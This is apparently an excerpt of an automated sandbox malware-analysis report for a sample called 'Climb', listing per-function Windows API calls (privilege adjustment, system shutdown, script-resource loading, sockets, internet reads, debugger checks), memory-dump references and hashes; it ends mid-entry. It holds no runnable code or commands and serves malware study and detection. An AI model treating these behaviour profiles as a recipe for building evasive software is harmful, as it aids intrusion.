                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                                          • Opcode ID: ed41398ee8773eb79fa6c6258207007436fbb5cf0d8af697ebb6865202dca2d3
                                                                                                                                                                          • Instruction ID: fb458ff8d2aeae6e41364dbc623ac5513ee58a070912db8c7976df6c6859c6b7
                                                                                                                                                                          • Opcode Fuzzy Hash: ed41398ee8773eb79fa6c6258207007436fbb5cf0d8af697ebb6865202dca2d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C418B34A04621AFD710CF15E888B55BBE4EF45318F15C0ADE8198BA72C775ED82CB90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00112010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011205A
                                                                                                                                                                            • Part of subcall function 00112010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00112087
                                                                                                                                                                            • Part of subcall function 00112010: GetLastError.KERNEL32 ref: 00112097
                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0011F249
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                          • Opcode ID: ca28189ebe2a79e07a89b509b070b4f7449ea33f39e93f4f695e936431fbc953
                                                                                                                                                                          • Instruction ID: c98419663d463e498787957031a9dc054fefdc03428bdb119f5a7d93fe807f33
                                                                                                                                                                          • Opcode Fuzzy Hash: ca28189ebe2a79e07a89b509b070b4f7449ea33f39e93f4f695e936431fbc953
                                                                                                                                                                          • Instruction Fuzzy Hash: 5601D67A6102106BEF1C66B8AC8AFFA72AC9B19354F254539FD02E31E1D770DDC291A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000F56C2,?,?,00000000,00000000), ref: 00123A1E
                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000F56C2,?,?,00000000,00000000), ref: 00123A35
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,000F56C2,?,?,00000000,00000000,?,?,?,?,?,?,000B66CE), ref: 00123A45
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,000F56C2,?,?,00000000,00000000,?,?,?,?,?,?,000B66CE), ref: 00123A56
                                                                                                                                                                          • LockResource.KERNEL32(000F56C2,?,?,000F56C2,?,?,00000000,00000000,?,?,?,?,?,?,000B66CE,?), ref: 00123A65
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                          • Opcode ID: 9ae4e0f7d1cf24bcb0da9623e322273235103e82f7bca9c34559bb6b08512f6a
                                                                                                                                                                          • Instruction ID: 919be4c6734f36c8292c29582ee653775ab1e82679db2b30b2e2c7a944a3f0c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ae4e0f7d1cf24bcb0da9623e322273235103e82f7bca9c34559bb6b08512f6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F117974200701BFEB218B65EC48F277BB9EFC6B40F14426DF416D76A0DBB1E9008A20
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00111900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00111916
                                                                                                                                                                            • Part of subcall function 00111900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00111922
                                                                                                                                                                            • Part of subcall function 00111900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00111931
                                                                                                                                                                            • Part of subcall function 00111900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00111938
                                                                                                                                                                            • Part of subcall function 00111900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0011194E
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00111C81), ref: 001120FB
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112107
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0011210E
                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00112127
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00111C81), ref: 0011213B
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00112142
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                          • Opcode ID: 0772cc5320520dd5878bf0e44945c34ebb7b3ff769485fb98868ae56db74596d
                                                                                                                                                                          • Instruction ID: 32eddfe55b1200714e07101602de814ed7d4791ed52839ec5c408495a0c3155e
                                                                                                                                                                          • Opcode Fuzzy Hash: 0772cc5320520dd5878bf0e44945c34ebb7b3ff769485fb98868ae56db74596d
                                                                                                                                                                          • Instruction Fuzzy Hash: 2011AC75600204FFDB18DFA4EC09BEE7BA9EF45365F144028F94197220C7359990CB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0012A5BD
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0012A6D0
                                                                                                                                                                            • Part of subcall function 001242B9: GetInputState.USER32 ref: 00124310
                                                                                                                                                                            • Part of subcall function 001242B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001243AB
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0012A5ED
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0012A6BA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                          • Opcode ID: 5c5a949adcb726b67872c3ce077254bd62eb657ba4138ab90e7136e0de6201b6
                                                                                                                                                                          • Instruction ID: e04db2d7226216f3d848a3f71de37bbe9e729440bc0263218b1f792d45f74956
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c5a949adcb726b67872c3ce077254bd62eb657ba4138ab90e7136e0de6201b6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41807190021AAFCF15DFA4EC49AEEBBB5FF05310F54405AE805A31A1EB719E94CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 000B233E
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 000B2421
                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 000B2434
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 929743424-0
                                                                                                                                                                          • Opcode ID: fc534a1736efeded1338274ddf5fde2fa4de96debe7f6c384a8b0d712bb81ffd
                                                                                                                                                                          • Instruction ID: cc0c5c1bfa491d2ab14b76698f4dc7c099d70cd8f0aef386a102dcace56f1c67
                                                                                                                                                                          • Opcode Fuzzy Hash: fc534a1736efeded1338274ddf5fde2fa4de96debe7f6c384a8b0d712bb81ffd
                                                                                                                                                                          • Instruction Fuzzy Hash: FF815EF0108508BDE679B63C8C98EFF25DEDB42750F150119F202D6EAACA5DDF42A276
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00133AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00133AD7
                                                                                                                                                                            • Part of subcall function 00133AAB: _wcslen.LIBCMT ref: 00133AF8
                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001322BA
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001322E1
                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00132338
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00132343
                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00132372
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                          • Opcode ID: 0a216405a2c9628b25181a748a2135a390fee012e8c4e81346fe5f5e882d660e
                                                                                                                                                                          • Instruction ID: d236e8b1ae3cd2c16333ee0223b459a8e8f5a08ba5e88814ab46ceb0807c4557
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a216405a2c9628b25181a748a2135a390fee012e8c4e81346fe5f5e882d660e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A51B175A00200AFE710AF24C886FAA77A5AF49754F448098F956AB293C774ED41CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                          • Opcode ID: e57c02698c1a8802e5973443fb18af8306c199913394b80420542668873d4a40
                                                                                                                                                                          • Instruction ID: 85063b54aa061f2981f2ab5b2859ba0bc3cfa88c13c9cf12107f44d35b953d16
                                                                                                                                                                          • Opcode Fuzzy Hash: e57c02698c1a8802e5973443fb18af8306c199913394b80420542668873d4a40
                                                                                                                                                                          • Instruction Fuzzy Hash: EB21F7357002108FD7119F26D844B5A7BE5EFA5325F99806CF84A8B372CB71EC82CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0012D8CE
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0012D92F
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 0012D943
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                          • Opcode ID: c81fd135afc0a1eb160c73a346d10bbae2d4a83c6b70edf6627be82b0222198f
                                                                                                                                                                          • Instruction ID: 86f2cfe677d8e3915c33e871ba605619a498fa27e02a5730874fc45c88a70563
                                                                                                                                                                          • Opcode Fuzzy Hash: c81fd135afc0a1eb160c73a346d10bbae2d4a83c6b70edf6627be82b0222198f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0221A1B5500715AFEB209F65F848BAAB7FCEB41318F10441EF646D2252E770EA94CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,000F46AC), ref: 0011E482
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0011E491
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011E4A2
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0011E4AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                          • Opcode ID: 44d4e01d1474573dd12ab6407ebbf5daaf75b96d816aa2c2644b9320fc35d698
                                                                                                                                                                          • Instruction ID: 3a4a849937dcce75c6141a4e517a09cef2bd13a4ba51b53f4f2a7c7253ddda41
                                                                                                                                                                          • Opcode Fuzzy Hash: 44d4e01d1474573dd12ab6407ebbf5daaf75b96d816aa2c2644b9320fc35d698
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0A030410910579A1967B8BC0D8AA76AEAF02336B504711FD76C28F0D7B899D58696
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                          • Opcode ID: cc5f443a8cca1e8ff7318e605e7e0589fc801390b7c28c7e830864aabc46cc43
                                                                                                                                                                          • Instruction ID: e740f15a05c6cfc2083570bdb1ee5b5c3764aaaf2a6f9f0bfdd344adc56e0ebb
                                                                                                                                                                          • Opcode Fuzzy Hash: cc5f443a8cca1e8ff7318e605e7e0589fc801390b7c28c7e830864aabc46cc43
                                                                                                                                                                          • Instruction Fuzzy Hash: DFD012B1C04108D6CB989B91ED48DBD73BDBB28300F558C56F946E1080EBA1D9489B21
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 000E2A8A
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 000E2A94
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 000E2AA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: 9b7a861816fb7ccc5029c952281eb5dcd73ab0c03c240450a3ab6653a19812f1
                                                                                                                                                                          • Instruction ID: c82b6c9e5822d5d15bf4ef2ccbaf22b4ab326fe890a857c2e096586ddfc1f5f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b7a861816fb7ccc5029c952281eb5dcd73ab0c03c240450a3ab6653a19812f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4831D37490132C9BCB21DF68D9887DCBBB8BF08310F5042EAE80CA6261E7309F858F55
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000D014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000D09D8
                                                                                                                                                                            • Part of subcall function 000D014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000D09F5
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011205A
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00112087
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00112097
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 577356006-0
                                                                                                                                                                          • Opcode ID: 16f09580eff6f5da16717914f42adfac5b9909b1b7b5ad673a049c6792f77a5d
                                                                                                                                                                          • Instruction ID: b098af1f50dd9ac6b6b78ddd9edab670120fdb44a9b6af3c64c763d6933fdfa2
                                                                                                                                                                          • Opcode Fuzzy Hash: 16f09580eff6f5da16717914f42adfac5b9909b1b7b5ad673a049c6792f77a5d
                                                                                                                                                                          • Instruction Fuzzy Hash: E711BFB1400304AFD7189F54EC86EABB7B8EB09710F20852EF04653251DB70FC81CB20
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002,00000000), ref: 000D5079
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002,00000000), ref: 000D5080
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 000D5092
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: b9cbc2d8dccee8fee277c9218785410e371f1fd53fa7cde414687c9c4a3902e5
                                                                                                                                                                          • Instruction ID: c36c9290974f2a148b72eb105c392ac9f638641a50e4d34092e972488eda021f
                                                                                                                                                                          • Opcode Fuzzy Hash: b9cbc2d8dccee8fee277c9218785410e371f1fd53fa7cde414687c9c4a3902e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 9CE0B635000648AFCF216F54ED09E983FA9EF51792F514015FC599AA32DB35DD82CAD0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0010E664
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
